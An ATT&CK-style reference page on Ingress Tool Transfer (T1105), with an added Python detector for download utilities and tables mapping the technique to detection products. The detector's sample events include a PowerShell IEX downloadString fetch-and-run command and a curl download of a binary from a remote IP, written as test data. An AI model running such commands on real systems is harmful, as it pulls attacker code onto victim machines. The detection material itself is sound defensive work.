Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).
On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil, and PowerShell commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.(Citation: t1105_lolbas)
Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows search-ms protocol handler, to deliver malicious files to victims through remote file searches invoked by User Execution (typically after interacting with Phishing lures).(Citation: T1105: Trellix_search-ms)
Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)
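The utilities named in the description can be turned into a simple process-creation check. The following is an added example, not part of the original page or of any vendor rule it references; the event field names (`host`, `image`, `cmdline`), the sample events, and the rule table are assumptions constructed for illustration, and the rules cover only a subset of the listed utilities.

```python
import re
from pathlib import PureWindowsPath

# Patterns for "references a remote source", per utility named in the description.
URL = re.compile(r"\b(?:https?|ftp)://[^\s'\"]+", re.I)
REMOTE_SPEC = re.compile(r"\S+@[\w.-]+(?::\S*)?")  # user@host[:path] only
PS_DOWNLOAD = re.compile(r"downloadstring|invoke-webrequest", re.I)

RULES = {
    "curl": URL, "wget": URL, "certutil": URL,
    "powershell": PS_DOWNLOAD, "pwsh": PS_DOWNLOAD,
    "scp": REMOTE_SPEC, "sftp": REMOTE_SPEC, "rsync": REMOTE_SPEC,
    "finger": REMOTE_SPEC,
}

def utility_name(image):
    """Lower-cased basename without .exe; accepts Windows and POSIX paths."""
    name = PureWindowsPath(image).name.lower()
    return name[:-4] if name.endswith(".exe") else name

def match_event(event):
    """Return (utility, evidence) when a listed utility references a remote source."""
    pattern = RULES.get(utility_name(event["image"]))
    found = pattern.search(event["cmdline"]) if pattern else None
    return (utility_name(event["image"]), found.group(0)) if found else None

def scan(events):
    """Return (host, utility, evidence) for every matching event, in input order."""
    return [(e["host"], *hit) for e in events if (hit := match_event(e))]

# Constructed process-creation events (hypothetical schema, documentation addresses).
EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Users\Public\a.bin http://198.51.100.7/a.bin"},
    {"host": "ws01", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe --version"},
    {"host": "ws02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c IEX(New-Object Net.WebClient).downloadString('http://example.invalid/s.ps1')"},
    {"host": "db01", "image": "/usr/bin/scp",
     "cmdline": "scp ops@203.0.113.9:/tmp/t.tgz /var/tmp/"},
    {"host": "db01", "image": "/usr/bin/rsync",
     "cmdline": "rsync -a /srv/data/ /backup/data/"},
]

if __name__ == "__main__":
    for host, util, evidence in scan(EVENTS):
        print(f"{host}: {util} -> {evidence}")
```

Matching on the image basename rather than the full path keeps the check working when the same utility runs from a non-standard directory; benign invocations such as `curl.exe --version` and a local-only `rsync` are not flagged.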
Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
---|---|---|---|---|---|
action.hacking.variety.Abuse of functionality | Abuse of functionality. | related-to | T1105 | Ingress Tool Transfer | |
action.hacking.variety.Other | Other | related-to | T1105 | Ingress Tool Transfer | |
action.hacking.vector.Other network service | Network service that is not remote access or a web application. | related-to | T1105 | Ingress Tool Transfer | |

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
---|---|---|---|---|---|
google_secops | Google Security Operations | technique_scores | T1105 | Ingress Tool Transfer | Comments: Google Security Ops is able to trigger an alert based on suspicious system processes that could indicate tool transfer attempts using cURL from Windows machines (e.g., C:\Windows\System32\curl.exe). This technique was scored as minimal based on a low or uncertain detection coverage factor. https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/threat_hunting/windows/suspicious_curl_usage.yaral |
security_command_center | Security Command Center | technique_scores | T1105 | Ingress Tool Transfer | Comments: SCC uses machine learning [NLP techniques] to evaluate the content of an executed bash script. This security solution protects against potentially malicious scripts that are used to transfer tools into a compromised environment and execute commands without binaries. Because of the high threat detection coverage provided by the ML model and the near-real-time temporal factor, this control was graded as significant. |